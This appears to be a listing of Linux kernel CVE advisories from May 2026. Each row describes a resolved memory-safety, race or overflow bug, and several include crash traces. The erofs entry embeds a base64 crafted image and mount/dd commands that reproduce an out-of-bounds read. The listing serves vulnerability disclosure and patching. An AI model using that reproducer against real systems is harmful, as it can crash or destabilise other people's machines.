| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gfs2: Fix use-after-free in iomap inline data write path The inline data buffer head (dibh) is being released prematurely in gfs2_iomap_begin() via release_metapath() while iomap->inline_data still points to dibh->b_data. This causes a use-after-free when iomap_write_end_inline() later attempts to write to the inline data area. The bug sequence: 1. gfs2_iomap_begin() calls gfs2_meta_inode_buffer() to read inode metadata into dibh 2. Sets iomap->inline_data = dibh->b_data + sizeof(struct gfs2_dinode) 3. Calls release_metapath() which calls brelse(dibh), dropping refcount to 0 4. kswapd reclaims the page (~39ms later in the syzbot report) 5. iomap_write_end_inline() tries to memcpy() to iomap->inline_data 6. KASAN detects use-after-free write to freed memory Fix by storing dibh in iomap->private and incrementing its refcount with get_bh() in gfs2_iomap_begin(). The buffer is then properly released in gfs2_iomap_end() after the inline write completes, ensuring the page stays alive for the entire iomap operation. Note: A C reproducer is not available for this issue. The fix is based on analysis of the KASAN report and code review showing the buffer head is freed before use. [agruenba: Take buffer head reference in gfs2_iomap_begin() to avoid leaks in gfs2_iomap_get() and gfs2_iomap_alloc().] | 2026-05-27 | 7.8 | CVE-2026-45984 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: udf: fix partition descriptor append bookkeeping Mounting a crafted UDF image with repeated partition descriptors can trigger a heap out-of-bounds write in part_descs_loc[]. handle_partition_descriptor() deduplicates entries by partition number, but appended slots never record partnum. As a result duplicate Partition Descriptors are appended repeatedly and num_part_descs keeps growing. Once the table is full, the growth path still sizes the allocation from partnum even though inserts are indexed by num_part_descs. If partnum is already aligned to PART_DESC_ALLOC_STEP, ALIGN(partnum, step) can keep the old capacity and the next append writes past the end of the table. Store partnum in the appended slot and size growth from the next append count so deduplication and capacity tracking follow the same model. | 2026-05-27 | 7.8 | CVE-2026-45991 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: fix unsigned underflow in z_erofs_lz4_handle_overlap() Some crafted images can have illegal (!partial_decoding && m_llen < m_plen) extents, and the LZ4 inplace decompression path can be wrongly hit, but it cannot handle (outpages < inpages) properly: "outpages - inpages" wraps to a large value and the subsequent rq->out[] access reads past the decompressed_pages array. However, such crafted cases can correctly result in a corruption report in the normal LZ4 non-inplace path. Let's add an additional check to fix this for backporting. Reproducible image (base64-encoded gzipped blob): H4sIAJGR12kCA+3SPUoDQRgG4MkmkkZk8QRbRFIIi9hbpEjrHQI5ghfwCN5BLCzTGtLbBI+g dilSJo1CnIm7GEXFxhT6PDDwfrs73/ywIQD/1ePD4r7Ou6ETsrq4mu7XcWfj++Pb58nJU/9i PNtbjhan04/9GtX4qVYc814WDqt6FaX5s+ZwXXeq52lndT6IuVvlblytLMvh4Gzwaf90nsvz 2DF/21+20T/ldgp5s1jXRaN4t/8izsy/OUB6e/Qa79r+JwAAAAAAAL52vQVuGQAAAP6+my1w ywAAAAAAAADwu14ATsEYtgBQAAA= $ mount -t erofs -o cache_strategy=disabled foo.erofs /mnt $ dd if=/mnt/data of=/dev/null bs=4096 count=1 | 2026-05-27 | 7.1 | CVE-2026-45999 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/nouveau: fix u32 overflow in pushbuf reloc bounds check nouveau_gem_pushbuf_reloc_apply() validates each relocation with if (r->reloc_bo_offset + 4 > nvbo->bo.base.size) but reloc_bo_offset is __u32 (uapi/drm/nouveau_drm.h) and the integer literal 4 promotes to unsigned int, so the addition is performed in 32 bits and wraps before the comparison against the size_t bo size. Cast to u64 so the addition happens in 64-bit arithmetic. [ Add Fixes: tag. - Danilo ] | 2026-05-27 | 7.8 | CVE-2026-46006 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: mtk-jpeg: fix use-after-free in release path due to uncancelled work The mtk_jpeg_release() function frees the context structure (ctx) without first cancelling any pending or running work in ctx->jpeg_work. This creates a race window where the workqueue callback may still be accessing the context memory after it has been freed. Race condition: CPU 0 (release) CPU 1 (workqueue) ---------------- ------------------ close() mtk_jpeg_release() mtk_jpegenc_worker() ctx = work->data // accessing ctx kfree(ctx) // freed! access ctx // UAF! The work is queued via queue_work() during JPEG encode/decode operations (via mtk_jpeg_device_run). If the device is closed while work is pending or running, the work handler will access freed memory. Fix this by calling cancel_work_sync() BEFORE acquiring the mutex. This ordering is critical: if cancel_work_sync() is called after mutex_lock(), and the work handler also tries to acquire the same mutex, it would cause a deadlock. Note: The open error path does NOT need cancel_work_sync() because INIT_WORK() only initializes the work structure - it does not schedule it. Work is only scheduled later during ioctl operations. | 2026-05-27 | 7.8 | CVE-2026-46011 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tcp: call sk_data_ready() after listener migration When inet_csk_listen_stop() migrates an established child socket from a closing listener to another socket in the same SO_REUSEPORT group, the target listener gets a new accept-queue entry via inet_csk_reqsk_queue_add(), but that path never notifies the target listener's waiters. A nonblocking accept() still works because it checks the queue directly, but poll()/epoll_wait() waiters and blocking accept() callers can also remain asleep indefinitely. Call READ_ONCE(nsk->sk_data_ready)(nsk) after a successful migration in inet_csk_listen_stop(). However, after inet_csk_reqsk_queue_add() succeeds, the ref acquired in reuseport_migrate_sock() is effectively transferred to nreq->rsk_listener. Another CPU can then dequeue nreq via accept() or listener shutdown, hit reqsk_put(), and drop that listener ref. Since listeners are SOCK_RCU_FREE, wrap the post-queue_add() dereferences of nsk in rcu_read_lock()/rcu_read_unlock(), which also covers the existing sock_net(nsk) access in that path. The reqsk_timer_handler() path does not need the same changes for two reasons: half-open requests become readable only after the final ACK, where tcp_child_process() already wakes the listener; and once nreq is visible via inet_ehash_insert(), the success path no longer touches nsk directly. | 2026-05-27 | 7.8 | CVE-2026-46015 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: Prevent potential null-ptr-deref in ceph_handle_auth_reply() If a message of type CEPH_MSG_AUTH_REPLY contains a zero value for both protocol and result, this is currently not treated as an error. In case of ac->negotiating == true and ac->protocol > 0, this leads to setting ac->protocol = 0 and ac->ops = NULL. Thereafter, the check for ac->protocol != protocol returns false, and init_protocol() is not called. Subsequently, ac->ops->handle_reply() is called, which leads to a null pointer dereference, because ac->ops is still NULL. This patch changes the check for ac->protocol != protocol to !ac->protocol, as this also includes the case when the protocol was set to zero in the message. This causes the message to be treated as containing a bad auth protocol. | 2026-05-27 | 7.5 | CVE-2026-46024 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/smc: avoid early lgr access in smc_clc_wait_msg A CLC decline can be received while the handshake is still in an early stage, before the connection has been associated with a link group. The decline handling in smc_clc_wait_msg() updates link-group level sync state for first-contact declines, but that state only exists after link group setup has completed. Guard the link-group update accordingly and keep the per-socket peer diagnosis handling unchanged. This preserves the existing sync_err handling for established link-group contexts and avoids touching link-group state before it is available. | 2026-05-27 | 7.5 | CVE-2026-46027 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/slab: return NULL early from kmalloc_nolock() in NMI on UP On UP kernels (!CONFIG_SMP), spin_trylock() is a no-op that unconditionally succeeds even when the lock is already held. As a result, kmalloc_nolock() called from NMI context can re-enter the slab allocator and acquire n->list_lock that the interrupted context is already holding, corrupting slab state. With CONFIG_DEBUG_SPINLOCK on UP, the following BUG is triggered with the slub_kunit test module: BUG: spinlock trylock failure on UP on CPU#0, kunit_try_catch/243 [...] Call Trace: <NMI> dump_stack_lvl+0x3f/0x60 do_raw_spin_trylock+0x41/0x50 _raw_spin_trylock+0x24/0x50 get_from_partial_node+0x120/0x4d0 ___slab_alloc+0x8a/0x4c0 kmalloc_nolock_noprof+0x164/0x310 [...] </NMI> Fix this by returning NULL early when invoked from NMI on a UP kernel. | 2026-05-27 | 7 | CVE-2026-46029 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ks8851: Reinstate disabling of BHs around IRQ handler If the driver executes ks8851_irq() AND a TX packet has been sent, then the driver enables TX queue via netif_wake_queue() which schedules TX softirq to queue packets for this device. If CONFIG_PREEMPT_RT=y is set AND a packet has also been received by the MAC, then ks8851_rx_pkts() calls netdev_alloc_skb_ip_align() to allocate SKBs for the received packets. If netdev_alloc_skb_ip_align() is called with BH enabled, then local_bh_enable() at the end of netdev_alloc_skb_ip_align() will trigger the pending softirq processing, which may ultimately call the .xmit callback ks8851_start_xmit_par(). The ks8851_start_xmit_par() will try to lock struct ks8851_net_par .lock spinlock, which is already locked by ks8851_irq() from which ks8851_start_xmit_par() was called. This leads to a deadlock, which is reported by the kernel, including a trace listed below. If CONFIG_PREEMPT_RT is not set, then since commit 0913ec336a6c0 ("net: ks8851: Fix deadlock with the SPI chip variant") the deadlock can also be triggered without received packet in the RX FIFO. The pending softirqs will be processed on return from spin_unlock_bh(&ks->statelock) in ks8851_irq(), which triggers the deadlock as well. Fix the problem by disabling BH around critical sections, including the IRQ handler, thus preventing the net_tx_action() softirq from triggering during these critical sections. The net_tx_action() softirq is triggered once BH are re-enabled and at the end of the IRQ handler, once all the other IRQ handler actions have been completed. __schedule from schedule_rtlock+0x1c/0x34 schedule_rtlock from rtlock_slowlock_locked+0x548/0x904 rtlock_slowlock_locked from rt_spin_lock+0x60/0x9c rt_spin_lock from ks8851_start_xmit_par+0x74/0x1a8 ks8851_start_xmit_par from netdev_start_xmit+0x20/0x44 netdev_start_xmit from dev_hard_start_xmit+0xd0/0x188 dev_hard_start_xmit from sch_direct_xmit+0xb8/0x25c sch_direct_xmit from __qdisc_run+0x1f8/0x4ec __qdisc_run from qdisc_run+0x1c/0x28 qdisc_run from net_tx_action+0x1f0/0x268 net_tx_action from handle_softirqs+0x1a4/0x270 handle_softirqs from __local_bh_enable_ip+0xcc/0xe0 __local_bh_enable_ip from __alloc_skb+0xd8/0x128 __alloc_skb from __netdev_alloc_skb+0x3c/0x19c __netdev_alloc_skb from ks8851_irq+0x388/0x4d4 ks8851_irq from irq_thread_fn+0x24/0x64 irq_thread_fn from irq_thread+0x178/0x28c irq_thread from kthread+0x12c/0x138 kthread from ret_from_fork+0x14/0x28 | 2026-05-27 | 7.5 | CVE-2026-46031 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vfio/cdx: Serialize VFIO_DEVICE_SET_IRQS with a per-device mutex vfio_cdx_set_msi_trigger() reads vdev->config_msi and operates on the vdev->cdx_irqs array based on its value, but provides no serialization against concurrent VFIO_DEVICE_SET_IRQS ioctls. Two callers can race such that one observes config_msi as set while another clears it and frees cdx_irqs via vfio_cdx_msi_disable(), resulting in a use-after-free of the cdx_irqs array. Add a cdx_irqs_lock mutex to struct vfio_cdx_device and acquire it in vfio_cdx_set_msi_trigger(), which is the single chokepoint through which all updates to config_msi, cdx_irqs, and msi_count flow, covering both the ioctl path and the close-device cleanup path. This keeps the test of config_msi atomic with the subsequent enable, disable, or trigger operations. Drop the pre-call !cdx_irqs test from vfio_cdx_irqs_cleanup() as part of this change: the optimization it provided is redundant with the !config_msi early-return inside vfio_cdx_msi_disable(), and leaving the test in place would be an unsynchronized read of state the new lock is meant to protect. | 2026-05-27 | 7.8 | CVE-2026-46036 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ceph: only d_add() negative dentries when they are unhashed Ceph can call d_add(dentry, NULL) on a negative dentry that is already present in the primary dcache hash. In the current VFS that is not safe. d_add() goes through __d_add() to __d_rehash(), which unconditionally reinserts dentry->d_hash into the hlist_bl bucket. If the dentry is already hashed, reinserting the same node can corrupt the bucket, including creating a self-loop. Once that happens, __d_lookup() can spin forever in the hlist_bl walk, typically looping only on the d_name.hash mismatch check and eventually triggering RCU stall reports like this one: rcu: INFO: rcu_sched self-detected stall on CPU rcu: 87-....: (2100 ticks this GP) idle=3a4c/1/0x4000000000000000 softirq=25003319/25003319 fqs=829 rcu: (t=2101 jiffies g=79058445 q=698988 ncpus=192) CPU: 87 UID: 2952868916 PID: 3933303 Comm: php-cgi8.3 Not tainted 6.18.17-i1-amd #950 NONE Hardware name: Dell Inc. PowerEdge R7615/0G9DHV, BIOS 1.6.6 09/22/2023 RIP: 0010:__d_lookup+0x46/0xb0 Code: c1 e8 07 48 8d 04 c2 48 8b 00 49 89 fc 49 89 f5 48 89 c3 48 83 e3 fe 48 83 f8 01 77 0f eb 2d 0f 1f 44 00 00 48 8b 1b 48 85 db <74> 20 39 6b 18 75 f3 48 8d 7b 78 e8 ba 85 d0 00 4c 39 63 10 74 1f RSP: 0018:ff745a70c8253898 EFLAGS: 00000282 RAX: ff26e470054cb208 RBX: ff26e470054cb208 RCX: 000000006e958966 RDX: ff26e48267340000 RSI: ff745a70c82539b0 RDI: ff26e458f74655c0 RBP: 000000006e958966 R08: 0000000000000180 R09: 9cd08d909b919a89 R10: ff26e458f74655c0 R11: 0000000000000000 R12: ff26e458f74655c0 R13: ff745a70c82539b0 R14: d0d0d0d0d0d0d0d0 R15: 2f2f2f2f2f2f2f2f FS: 00007f5770896980(0000) GS:ff26e482c5d88000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f5764de50c0 CR3: 000000a72abb5001 CR4: 0000000000771ef0 PKRU: 55555554 Call Trace: <TASK> lookup_fast+0x9f/0x100 walk_component+0x1f/0x150 link_path_walk+0x20e/0x3d0 path_lookupat+0x68/0x180 filename_lookup+0xdc/0x1e0 vfs_statx+0x6c/0x140 vfs_fstatat+0x67/0xa0 __do_sys_newfstatat+0x24/0x60 do_syscall_64+0x6a/0x230 entry_SYSCALL_64_after_hwframe+0x76/0x7e This is reachable with reused cached negative dentries. A Ceph lookup or atomic_open can be handed a negative dentry that is already hashed, and fs/ceph/dir.c then hits one of two paths that incorrectly assume "negative" also means "unhashed": - ceph_finish_lookup(): MDS reply is -ENOENT with no trace -> d_add(dentry, NULL) - ceph_lookup(): local ENOENT fast path for a complete directory with shared caps -> d_add(dentry, NULL) Both paths can therefore re-add an already-hashed negative dentry. Ceph already uses the correct pattern elsewhere: ceph_fill_trace() only calls d_add(dn, NULL) for a negative null-dentry reply when d_unhashed(dn) is true. Fix both fs/ceph/dir.c sites the same way: only call d_add() for a negative dentry when it is actually unhashed. If the negative dentry is already hashed, leave it in place and reuse it as-is. This preserves the existing behavior for unhashed dentries while avoiding d_hash list corruption for reused hashed negatives. | 2026-05-27 | 7.5 | CVE-2026-46052 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: rds: fix MR cleanup on copy error __rds_rdma_map() hands sg/pages ownership to the transport after get_mr() succeeds. If copying the generated cookie back to user space fails after that point, the error path must not free those resources again before dropping the MR reference. Remove the duplicate unpin/free from the put_user() failure branch so that MR teardown is handled only through the existing final cleanup path. | 2026-05-27 | 7.8 | CVE-2026-46053 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: selinux: fix overlayfs mmap() and mprotect() access checks The existing SELinux security model for overlayfs is to allow access if the current task is able to access the top level file (the "user" file) and the mounter's credentials are sufficient to access the lower level file (the "backing" file). Unfortunately, the current code does not properly enforce these access controls for both mmap() and mprotect() operations on overlayfs filesystems. This patch makes use of the newly created security_mmap_backing_file() LSM hook to provide the missing backing file enforcement for mmap() operations, and leverages the backing file API and new LSM blob to provide the necessary information to properly enforce the mprotect() access controls. | 2026-05-27 | 7.1 | CVE-2026-46054 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: apparmor: Fix string overrun due to missing termination When booting Ubuntu 26.04 with Linux 7.0-rc4 on an ARM64 Qualcomm Snapdragon X1 we see a string buffer overrun: BUG: KASAN: slab-out-of-bounds in aa_dfa_match (security/apparmor/match.c:535) Read of size 1 at addr ffff0008901cc000 by task snap-update-ns/2120 CPU: 5 UID: 60578 PID: 2120 Comm: snap-update-ns Not tainted 7.0.0-rc4+ #22 PREEMPTLAZY Hardware name: LENOVO 83ED/LNVNB161216, BIOS NHCN60WW 09/11/2025 Call trace: show_stack (arch/arm64/kernel/stacktrace.c:501) (C) dump_stack_lvl (lib/dump_stack.c:122) print_report (mm/kasan/report.c:379 mm/kasan/report.c:482) kasan_report (mm/kasan/report.c:597) __asan_report_load1_noabort (mm/kasan/report_generic.c:378) aa_dfa_match (security/apparmor/match.c:535) match_mnt_path_str (security/apparmor/mount.c:244 security/apparmor/mount.c:336) match_mnt (security/apparmor/mount.c:371) aa_bind_mount (security/apparmor/mount.c:447 (discriminator 4)) apparmor_sb_mount (security/apparmor/lsm.c:719 (discriminator 1)) security_sb_mount (security/security.c:1062 (discriminator 31)) path_mount (fs/namespace.c:4101) __arm64_sys_mount (fs/namespace.c:4172 fs/namespace.c:4361 fs/namespace.c:4338 fs/namespace.c:4338) invoke_syscall.constprop.0 (arch/arm64/kernel/syscall.c:35 arch/arm64/kernel/syscall.c:49) el0_svc_common.constprop.0 (./include/linux/thread_info.h:142 (discriminator 2) arch/arm64/kernel/syscall.c:140 (discriminator 2)) do_el0_svc (arch/arm64/kernel/syscall.c:152) el0_svc (arch/arm64/kernel/entry-common.c:80 arch/arm64/kernel/entry-common.c:725) el0t_64_sync_handler (arch/arm64/kernel/entry-common.c:744) el0t_64_sync (arch/arm64/kernel/entry.S:596) Allocated by task 2120: kasan_save_stack (mm/kasan/common.c:58) kasan_save_track (./arch/arm64/include/asm/current.h:19 mm/kasan/common.c:70 mm/kasan/common.c:79) kasan_save_alloc_info (mm/kasan/generic.c:571) __kasan_kmalloc (mm/kasan/common.c:419) __kmalloc_noprof (./include/linux/kasan.h:263 mm/slub.c:5260 mm/slub.c:5272) aa_get_buffer (security/apparmor/lsm.c:2201) aa_bind_mount (security/apparmor/mount.c:442) apparmor_sb_mount (security/apparmor/lsm.c:719 (discriminator 1)) security_sb_mount (security/security.c:1062 (discriminator 31)) path_mount (fs/namespace.c:4101) __arm64_sys_mount (fs/namespace.c:4172 fs/namespace.c:4361 fs/namespace.c:4338 fs/namespace.c:4338) invoke_syscall.constprop.0 (arch/arm64/kernel/syscall.c:35 arch/arm64/kernel/syscall.c:49) el0_svc_common.constprop.0 (./include/linux/thread_info.h:142 (discriminator 2) arch/arm64/kernel/syscall.c:140 (discriminator 2)) do_el0_svc (arch/arm64/kernel/syscall.c:152) el0_svc (arch/arm64/kernel/entry-common.c:80 arch/arm64/kernel/entry-common.c:725) el0t_64_sync_handler (arch/arm64/kernel/entry-common.c:744) el0t_64_sync (arch/arm64/kernel/entry.S:596) The buggy address belongs to the object at ffff0008901ca000 which belongs to the cache kmalloc-rnd-06-8k of size 8192 The buggy address is located 0 bytes to the right of allocated 8192-byte region [ffff0008901ca000, ffff0008901cc000) The buggy address belongs to the physical page: page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x9101c8 head: order:3 mapcount:0 entire_mapcount:0 nr_pages_mapped:-1 pincount:0 flags: 0x8000000000000040(head|zone=2) page_type: f5(slab) raw: 8000000000000040 ffff000800016c40 fffffdffe2d14e10 ffff000800015c70 raw: 0000000000000000 0000000800010001 00000000f5000000 0000000000000000 head: 8000000000000040 ffff000800016c40 fffffdffe2d14e10 ffff000800015c70 head: 0000000000000000 0000000800010001 00000000f5000000 0000000000000000 head: 8000000000000003 fffffdffe2407201 fffffdffffffffff 00000000ffffffff head: ffffffffffffffff 0000000000000000 00000000ffffffff 0000000000000008 page dumped because: kasan: bad access detected Memory state around the buggy address: ffff0008901cbf00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ffff0008 ---truncated--- | 2026-05-27 | 7.1 | CVE-2026-46055 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: amphion: Fix race between m2m job_abort and device_run Fix kernel panic caused by race condition where v4l2_m2m_ctx_release() frees m2m_ctx while v4l2_m2m_try_run() is about to call device_run with the same context. Race sequence: v4l2_m2m_try_run(): v4l2_m2m_ctx_release(): lock/unlock v4l2_m2m_cancel_job() job_abort() v4l2_m2m_job_finish() kfree(m2m_ctx) <- frees ctx device_run() <- use-after-free crash at 0x538 Crash trace: Unable to handle kernel read from unreadable memory at virtual address 0000000000000538 v4l2_m2m_try_run+0x78/0x138 v4l2_m2m_device_run_work+0x14/0x20 The amphion vpu driver does not rely on the m2m framework's device_run callback to perform encode/decode operations. Fix the race by preventing m2m framework job scheduling entirely: - Add job_ready callback returning 0 (no jobs ready for m2m framework) - Remove job_abort callback to avoid the race condition | 2026-05-27 | 7.8 | CVE-2026-46058 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ntfs3: fix integer overflow in run_unpack() volume boundary check The volume boundary check `lcn + len > sbi->used.bitmap.nbits` uses raw addition which can wrap around for large lcn and len values, bypassing the validation. Use check_add_overflow() as is already done for the adjacent prev_lcn + dlcn and vcn64 + len checks added by commit 3ac37e100385 ("ntfs3: Fix integer overflow in run_unpack()"). Found by fuzzing with a source-patched harness (LibAFL + QEMU). | 2026-05-27 | 7.8 | CVE-2026-46062 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbdev: defio: Disconnect deferred I/O from the lifetime of struct fb_info Hold state of deferred I/O in struct fb_deferred_io_state. Allocate an instance as part of initializing deferred I/O and remove it only after the final mapping has been closed. If the fb_info and the contained deferred I/O meanwhile goes away, clear struct fb_deferred_io_state.info to invalidate the mapping. Any access will then result in a SIGBUS signal. Fixes a long-standing problem, where a device hot-unplug happens while user space still has an active mapping of the graphics memory. The hot- unplug frees the instance of struct fb_info. Accessing the memory will operate on undefined state. | 2026-05-27 | 7.8 | CVE-2026-46065 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid5: validate payload size before accessing journal metadata r5c_recovery_analyze_meta_block() and r5l_recovery_verify_data_checksum_for_mb() iterate over payloads in a journal metadata block using on-disk payload size fields without validating them against the remaining space in the metadata block. A corrupted journal contains payload sizes extending beyond the PAGE_SIZE boundary can cause out-of-bounds reads when accessing payload fields or computing offsets. Add bounds validation for each payload type to ensure the full payload fits within meta_size before processing. | 2026-05-27 | 7.1 | CVE-2026-46070 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: nSVM: Raise #UD if unhandled VMMCALL isn't intercepted by L1 Explicitly synthesize a #UD for VMMCALL if L2 is active, L1 does NOT want to intercept VMMCALL, nested_svm_l2_tlb_flush_enabled() is true, and the hypercall is something other than one of the supported Hyper-V hypercalls. When all of the above conditions are met, KVM will intercept VMMCALL but never forward it to L1, i.e. will let L2 make hypercalls as if it were L1. The TLFS says a whole lot of nothing about this scenario, so go with the architectural behavior, which says that VMMCALL #UDs if it's not intercepted. Opportunistically do a 2-for-1 stub trade by stub-ifying the new API instead of the helpers it uses. The last remaining "single" stub will soon be dropped as well. [sean: rewrite changelog and comment, tag for stable, remove defunct stubs] | 2026-05-27 | 7.9 | CVE-2026-46076 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: fix the out-of-bounds nameoff handling for trailing dirents Currently we already have boundary-checks for nameoffs, but the trailing dirents are special since the namelens are calculated with strnlen() with unchecked nameoffs. If a crafted EROFS has a trailing dirent with nameoff >= maxsize, maxsize - nameoff can underflow, causing strnlen() to read past the directory block. nameoff0 should also be verified to be a multiple of `sizeof(struct erofs_dirent)` as well [1]. [1] https://sashiko.dev/#/patchset/20260416063511.3173774-1-hsiangkao%40linux.alibaba.com | 2026-05-27 | 7.1 | CVE-2026-46078 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: acomp - fix wrong pointer stored by acomp_save_req() acomp_save_req() stores &req->chain in req->base.data. When acomp_reqchain_done() is invoked on asynchronous completion, it receives &req->chain as the data argument but casts it directly to struct acomp_req. Since data points to the chain member, all subsequent field accesses are at a wrong offset, resulting in memory corruption. The issue occurs when an asynchronous hardware implementation, such as the QAT driver, completes a request that uses the DMA virtual address interface (e.g. acomp_request_set_src_dma()). This combination causes crypto_acomp_compress() to enter the acomp_do_req_chain() path, which sets acomp_reqchain_done() as the completion callback via acomp_save_req(). With KASAN enabled, this manifests as a general protection fault in acomp_reqchain_done(): general protection fault, probably for non-canonical address 0xe000040000000000 KASAN: probably user-memory-access in range [0x0000400000000000-0x0000400000000007] RIP: 0010:acomp_reqchain_done+0x15b/0x4e0 Call Trace: <IRQ> qat_comp_alg_callback+0x5d/0xa0 [intel_qat] adf_ring_response_handler+0x376/0x8b0 [intel_qat] adf_response_handler+0x60/0x170 [intel_qat] tasklet_action_common+0x223/0x820 handle_softirqs+0x1ab/0x640 </IRQ> Fix this by storing the request itself in req->base.data instead of &req->chain, so that acomp_reqchain_done() receives the correct pointer. Simplify acomp_restore_req() accordingly to access req->chain directly. | 2026-05-27 | 7.8 | CVE-2026-46081 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rxrpc: Fix rxkad crypto unalignment handling Fix handling of a packet with a misaligned crypto length. Also handle non-ENOMEM errors from decryption by aborting. Further, remove the WARN_ON_ONCE() so that it can't be remotely triggered (a trace line can still be emitted). | 2026-05-27 | 7.5 | CVE-2026-46085 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: aloop: Fix peer runtime UAF during format-change stop loopback_check_format() may stop the capture side when playback starts with parameters that no longer match a running capture stream. Commit 826af7fa62e3 ("ALSA: aloop: Fix racy access at PCM trigger") moved the peer lookup under cable->lock, but the actual snd_pcm_stop() still runs after dropping that lock. A concurrent close can clear the capture entry from cable->streams[] and detach or free its runtime while the playback trigger path still holds a stale peer substream pointer. Keep a per-cable count of in-flight peer stops before dropping cable->lock, and make free_cable() wait for those stops before detaching the runtime. This preserves the existing behavior while making the peer runtime lifetime explicit. | 2026-05-27 | 7.8 | CVE-2026-46090 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/vmalloc: take vmap_purge_lock in shrinker decay_va_pool_node() can be invoked concurrently from two paths: __purge_vmap_area_lazy() when pools are being purged, and the shrinker via vmap_node_shrink_scan(). However, decay_va_pool_node() is not safe to run concurrently, and the shrinker path currently lacks serialization, leading to races and possible leaks. Protect decay_va_pool_node() by taking vmap_purge_lock in the shrinker path to ensure serialization with purge users. | 2026-05-27 | 7.8 | CVE-2026-46093 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs: afs: revert mmap_prepare() change Partially reverts commit 9d5403b1036c ("fs: convert most other generic_file_*mmap() users to .mmap_prepare()"). This is because the .mmap invocation establishes a refcount, but .mmap_prepare is called at a point where a merge or an allocation failure might happen after the call, which would leak the refcount increment. Functionality is being added to permit the use of .mmap_prepare in this case, but in the interim, we need to fix this. | 2026-05-27 | 7.8 | CVE-2026-46100 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: strparser: fix skb_head leak in strp_abort_strp() When the stream parser is aborted, for example after a message assembly timeout, it can still hold a reference to a partially assembled message in strp->skb_head. That skb is not released in strp_abort_strp(), which leaks the partially assembled message and can be triggered repeatedly to exhaust memory. Fix this by freeing strp->skb_head and resetting the parser state in the abort path. Leave strp_stop() unchanged so final cleanup still happens in strp_done() after the work and timer have been synchronized. | 2026-05-27 | 7.5 | CVE-2026-46102 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: mpt3sas: Limit NVMe request size to 2 MiB The HBA firmware reports NVMe MDTS values based on the underlying drive capability. However, because the driver allocates a fixed 4K buffer for the PRP list, accommodating at most 512 entries, the driver supports a maximum I/O transfer size of 2 MiB. Limit max_hw_sectors to the smaller of the reported MDTS and the 2 MiB driver limit to prevent issuing oversized I/O that may lead to a kernel oops. | 2026-05-28 | 7.8 | CVE-2026-46105 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm-thin: fix metadata refcount underflow There's a bug in dm-thin in the function rebalance_children. If the internal btree node has one entry, the code tries to copy all btree entries from the node's child to the node itself and then decrement the child's reference count. If the child node is shared (it has reference count > 1), we won't free it, so there would be two pointers to each of the grandchildren nodes. But the reference counts of the grandchildren is not increased, thus the reference count doesn't match the number of pointers that point to the grandchildren. This results in "device mapper: space map common: unable to decrement block" errors. Fix this bug by incrementing reference counts on the grandchildren if the btree node is shared. | 2026-05-28 | 7.8 | CVE-2026-46107 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: stmmac: Prevent NULL deref when RX memory exhausted The CPU receives frames from the MAC through conventional DMA: the CPU allocates buffers for the MAC, then the MAC fills them and returns ownership to the CPU. For each hardware RX queue, the CPU and MAC coordinate through a shared ring array of DMA descriptors: one descriptor per DMA buffer. Each descriptor includes the buffer's physical address and a status flag ("OWN") indicating which side owns the buffer: OWN=0 for CPU, OWN=1 for MAC. The CPU is only allowed to set the flag and the MAC is only allowed to clear it, and both must move through the ring in sequence: thus the ring is used for both "submissions" and "completions." In the stmmac driver, stmmac_rx() bookmarks its position in the ring with the `cur_rx` index. The main receive loop in that function checks for rx_descs[cur_rx].own=0, gives the corresponding buffer to the network stack (NULLing the pointer), and increments `cur_rx` modulo the ring size. After the loop exits, stmmac_rx_refill(), which bookmarks its position with `dirty_rx`, allocates fresh buffers and rearms the descriptors (setting OWN=1). If it fails any allocation, it simply stops early (leaving OWN=0) and will retry where it left off when next called. This means descriptors have a three-stage lifecycle (terms my own): - `empty` (OWN=1, buffer valid) - `full` (OWN=0, buffer valid and populated) - `dirty` (OWN=0, buffer NULL) But because stmmac_rx() only checks OWN, it confuses `full`/`dirty`. In the past (see 'Fixes:'), there was a bug where the loop could cycle `cur_rx` all the way back to the first descriptor it dirtied, resulting in a NULL dereference when mistaken for `full`. The aforementioned commit resolved that *specific* failure by capping the loop's iteration limit at `dma_rx_size - 1`, but this is only a partial fix: if the previous stmmac_rx_refill() didn't complete, then there are leftover `dirty` descriptors that the loop might encounter without needing to cycle fully around. The current code therefore panics (see 'Closes:') when stmmac_rx_refill() is memory-starved long enough for `cur_rx` to catch up to `dirty_rx`. Fix this by explicitly checking, before advancing `cur_rx`, if the next entry is dirty; exit the loop if so. This prevents processing of the final, used descriptor until 